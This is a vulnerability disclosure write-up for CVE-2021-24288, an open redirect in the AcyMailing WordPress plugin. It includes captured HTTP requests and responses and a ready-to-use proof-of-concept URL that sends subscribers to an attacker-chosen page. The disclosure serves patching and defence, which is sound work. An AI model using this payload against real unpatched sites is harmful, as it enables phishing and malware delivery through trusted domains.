4 min read

Hacking WordPress Plugins Part 2 - Open Redirect [CVE-2021-24288]

AcyMailing is a newsletter subscription WordPress plugin with more than 30.000 total downloads and more than 5.000 active installations.

The plugin versions prior to 7.5.0 are vulnerable to an open redirection. Any user who clicks on a URL link crafted by an attacker, which points to a vulnerable WordPress instance, will get redirected to any website the attacker chooses. Such an attack can be used in (spear-)phishing campaigns targeting user credentials or serving malware through “trusted” websites.

The plugin allows the visitors to subscribe to the website’s mailing list with their email address and receive emails and newsletters from the website’s owners and/or maintainers through a widget.

This subscription is done with a POST request, containing the user’s email address, their name, and some other information needed as parameters. In the AcyMailing configurations, the admin can set to redirect the user, once they subscribe or unsubscribe, as seen below.

If a redirect link to https://example.com is set by the admin, the POST request is as follows:

POST /index.php?page=acymailing_front&ctrl=frontusers&noheader=1 HTTP/1.1
Host: 178.128.186.227:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------171524592915568414794065600611
Content-Length: 1689
Origin: http://178.128.186.227:8081
Connection: close
Referer: http://178.128.186.227:8081/
Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=8bf4f0381d84055f2e1648d6e08a7b63
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="user[email]"

jfrinhiff@Nhun.cc
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="ctrl"

frontusers
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="task"

subscribe
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="option"

acymailing
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="redirect"

https://example.com
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="ajax"

0
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="successmode"

replace
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="acy_source"

widget 2
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="hiddenlists"

1
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="acyformname"

formAcym38261
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="acysubmode"

widget_acym
-----------------------------171524592915568414794065600611
Content-Disposition: form-data; name="confirmation_message"

-----------------------------171524592915568414794065600611--

With the response:

HTTP/1.1 302 Found
Date: Wed, 28 Apr 2021 07:28:46 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Redirect-By: WordPress
Location: https://example.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Exploit

In the above example, the admin has set the redirection link to https://example.com, as already mentioned. If the admin hasn’t set a redirection link, then the page simply refreshes and there is no redirection parameter in the request. If we were to change or add the redirection parameter from https://example.com to anything else, e.g. https://bitcrack.net, then we would get redirected to Bitcrack’s website:

HTTP/1.1 302 Found
Date: Wed, 28 Apr 2021 07:28:46 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Redirect-By: WordPress
Location: https://bitcrack.net
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

This means that the plugin’s backend code doesn’t sanitize the “redirect” parameter value and one can change it at will.

But still, this would count as a self-redirection, as the attacker should have physical access to the victim’s computer and change the request themselves. By turning the request type from POST to GET, an attacker can craft and send a link with a malicious landing page. To turn a POST request into a GET one, the attacker must append all the POST parameters in the URL as GET parameters.

It is important to note that a redirection link doesn’t need to have been set in order for the “redirect” parameter to work. That means that the user will always get redirected, regardless of the configuration. Also, the email address has to be a new one for each crafted link. If an already subscribed email address is being used, then the application throws an error and no subscription takes place, therefore no redirection.

The issue seems to be fixed in version 7.5.0

Final PoC:

http://website.com/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=<RANDOM_EMAIL_ADDRESS>&ctrl=frontusers&task=subscribe&option=acymailing&redirect=<MALICIOUS_LANDING_PAGE>&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym

Timeline:

Reported to WPScan: 21/4/2021
Status changed from Pending to Vendor contacted: 21/4/2021
Status changed from Vendor contacted to Waiting for patch: 22/4/2021
Submission approved and published: 29/4/2021 in https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97